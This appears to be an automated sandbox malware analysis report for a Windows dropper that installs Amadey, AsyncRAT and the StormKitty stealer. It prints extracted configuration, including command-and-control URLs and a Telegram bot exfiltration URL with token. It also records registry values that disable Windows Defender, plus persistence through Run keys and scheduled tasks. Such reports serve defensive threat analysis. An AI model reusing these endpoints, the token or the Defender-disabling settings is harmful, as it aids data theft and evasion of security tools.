Analysis
-
max time kernel
158s -
max time network
176s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
07/10/2023, 12:01 UTC
Static task
static1
Behavioral task
behavioral1
Sample
NEAS.56df87530d94170d58020ed2302a6610f69a73b63235acc7a6724892ab573674_JC.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
NEAS.56df87530d94170d58020ed2302a6610f69a73b63235acc7a6724892ab573674_JC.exe
Resource
win10v2004-20230915-en
General
-
Target
NEAS.56df87530d94170d58020ed2302a6610f69a73b63235acc7a6724892ab573674_JC.exe
-
Size
851KB
-
MD5
332be1fd1afc1ede533225df48f347a6
-
SHA1
ab007191fcbe1bcf3ac12ae4e02b52be4021b386
-
SHA256
56df87530d94170d58020ed2302a6610f69a73b63235acc7a6724892ab573674
-
SHA512
15d2762fdfe564103f6d5f20ec7e83b3861374b9d300abbe25b776876637ca819ffa7f4a7a24d113e7069e9ab6b8ecb3791d3ec2df6bab5495c24e0ff8eaf684
-
SSDEEP
24576:Lyokio090afwEzoDl/ueBan7URNlto0O6HId9ASfyu:+cIafRzoFBan7URNbo0xoPL
Malware Config
Extracted
amadey
3.89
http://77.91.124.1/theme/index.php
http://77.91.68.78/help/index.php
-
install_dir
fefffe8cea
-
install_file
explothe.exe
-
strings_key
36a96139c1118a354edf72b1080d4b2f
Extracted
asyncrat
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
https://api.telegram.org/bot6415420186:AAFl1R3-Kr5zbvKkeofTPjxvxd9leZKNs2M/sendMessage?chat_id=940609421
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 1aN73RF8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 1aN73RF8.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection 1aN73RF8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 1aN73RF8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 1aN73RF8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 1aN73RF8.exe -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 5 IoCs
resource yara_rule behavioral1/memory/2340-1072-0x0000000000400000-0x0000000000432000-memory.dmp family_stormkitty behavioral1/memory/2340-1073-0x0000000000400000-0x0000000000432000-memory.dmp family_stormkitty behavioral1/memory/2340-1076-0x0000000000400000-0x0000000000432000-memory.dmp family_stormkitty behavioral1/memory/2340-1078-0x0000000000400000-0x0000000000432000-memory.dmp family_stormkitty behavioral1/memory/2340-1080-0x0000000000400000-0x0000000000432000-memory.dmp family_stormkitty -
Async RAT payload 5 IoCs
resource yara_rule behavioral1/memory/2340-1072-0x0000000000400000-0x0000000000432000-memory.dmp asyncrat behavioral1/memory/2340-1073-0x0000000000400000-0x0000000000432000-memory.dmp asyncrat behavioral1/memory/2340-1076-0x0000000000400000-0x0000000000432000-memory.dmp asyncrat behavioral1/memory/2340-1078-0x0000000000400000-0x0000000000432000-memory.dmp asyncrat behavioral1/memory/2340-1080-0x0000000000400000-0x0000000000432000-memory.dmp asyncrat -
Downloads MZ/PE file
-
Executes dropped EXE 16 IoCs
pid Process 2156 cK5xf37.exe 2816 pc7OS86.exe 2644 yt3Dp39.exe 2080 to4uY17.exe 2756 1aN73RF8.exe 904 4Ia413Ie.exe 2444 explothe.exe 1656 5nT1Fl7.exe 1440 legota.exe 1880 6Es4UL91.exe 2328 pf1sbMGHARiKj7J.exe 1036 legota.exe 2668 explothe.exe 2340 pf1sbMGHARiKj7J.exe 2476 legota.exe 1016 explothe.exe -
Loads dropped DLL 33 IoCs
pid Process 3064 NEAS.56df87530d94170d58020ed2302a6610f69a73b63235acc7a6724892ab573674_JC.exe 2156 cK5xf37.exe 2156 cK5xf37.exe 2816 pc7OS86.exe 2816 pc7OS86.exe 2644 yt3Dp39.exe 2644 yt3Dp39.exe 2080 to4uY17.exe 2080 to4uY17.exe 2756 1aN73RF8.exe 2816 pc7OS86.exe 904 4Ia413Ie.exe 904 4Ia413Ie.exe 2444 explothe.exe 2156 cK5xf37.exe 1656 5nT1Fl7.exe 1656 5nT1Fl7.exe 1440 legota.exe 3064 NEAS.56df87530d94170d58020ed2302a6610f69a73b63235acc7a6724892ab573674_JC.exe 3064 NEAS.56df87530d94170d58020ed2302a6610f69a73b63235acc7a6724892ab573674_JC.exe 1880 6Es4UL91.exe 1440 legota.exe 2328 pf1sbMGHARiKj7J.exe 2168 rundll32.exe 2168 rundll32.exe 2168 rundll32.exe 1616 rundll32.exe 1616 rundll32.exe 1616 rundll32.exe 2168 rundll32.exe 1616 rundll32.exe 2328 pf1sbMGHARiKj7J.exe 2340 pf1sbMGHARiKj7J.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 1aN73RF8.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features 1aN73RF8.exe -
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" NEAS.56df87530d94170d58020ed2302a6610f69a73b63235acc7a6724892ab573674_JC.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" cK5xf37.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" pc7OS86.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" yt3Dp39.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" to4uY17.exe -
Drops desktop.ini file(s) 6 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\23a889714f44e4c5b9507e894e5a73f1\Admin@UUVOHKNL_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini pf1sbMGHARiKj7J.exe File opened for modification C:\Users\Admin\AppData\Local\23a889714f44e4c5b9507e894e5a73f1\Admin@UUVOHKNL_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini pf1sbMGHARiKj7J.exe File created C:\Users\Admin\AppData\Local\23a889714f44e4c5b9507e894e5a73f1\Admin@UUVOHKNL_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini pf1sbMGHARiKj7J.exe File opened for modification C:\Users\Admin\AppData\Local\23a889714f44e4c5b9507e894e5a73f1\Admin@UUVOHKNL_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini pf1sbMGHARiKj7J.exe File created C:\Users\Admin\AppData\Local\23a889714f44e4c5b9507e894e5a73f1\Admin@UUVOHKNL_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini pf1sbMGHARiKj7J.exe File created C:\Users\Admin\AppData\Local\23a889714f44e4c5b9507e894e5a73f1\Admin@UUVOHKNL_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini pf1sbMGHARiKj7J.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 93 icanhazip.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2328 set thread context of 2340 2328 pf1sbMGHARiKj7J.exe 76 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 pf1sbMGHARiKj7J.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier pf1sbMGHARiKj7J.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2760 schtasks.exe 2208 schtasks.exe 1564 schtasks.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 80508e4216f9d901 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ea3dc2a7c0fe4d49bd6e8f3e7e71513f000000000200000000001066000000010000200000002228f1e073936fbbd50374af3ad30734463341f02a1c46dd69f2897846021f29000000000e8000000002000020000000a6e09a4e019f40111557e39949a0d4616b14a4909ff17060ea6bb951f30b4e39900000003c327a011d9e5b09b934094ed1233ab258401c3b5a2967a1b712c190f252bcc97a9488567aa05e0d9d5ad8d3fb994025f3804b0b3cda78e5df5a33d283970f1f96330cb59d300fcdcad396416d24d1951a77700c6d5c820247ffdb628a9fab4c3584ba4242fddd6deabb9a09b2b4de340453eee15e8f082e0013be5a59e0a496e82cfe1f9e744f0671e82451e83588764000000029d8e917a236bdbecebe566261d35375b091f944f84d07d8cc31061a15a51bea7ed2ac7e32a85297baac4791adc7b33cd11fae28707f6e611ce46a8c89185aff iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ea3dc2a7c0fe4d49bd6e8f3e7e71513f000000000200000000001066000000010000200000005039a8374aa204d75c72e8c9ab1d5e1baa615f77d830994a65254744c5248ee3000000000e8000000002000020000000d82edbf25e98fc74db7c13d353915be13b44f96beb94a4f0699679a2079c8e212000000038bfc1db24635af2d2f2a96976d2b913bb48e5aa974e0c1d038ea23a0954050540000000ae2c4d1708991628a83c9bd37aa68a315b014255849a51d877f0a4a50f341d45fdb2d12ec9299ca3e1f6de5ba1371055eaaf5fb30bc7d6f8f3d424dd6cfc738c iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{6998D1F1-6509-11EE-91E1-FAA3B8E0C052} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{69967091-6509-11EE-91E1-FAA3B8E0C052} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "402842050" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Key created \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 legota.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 legota.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 legota.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a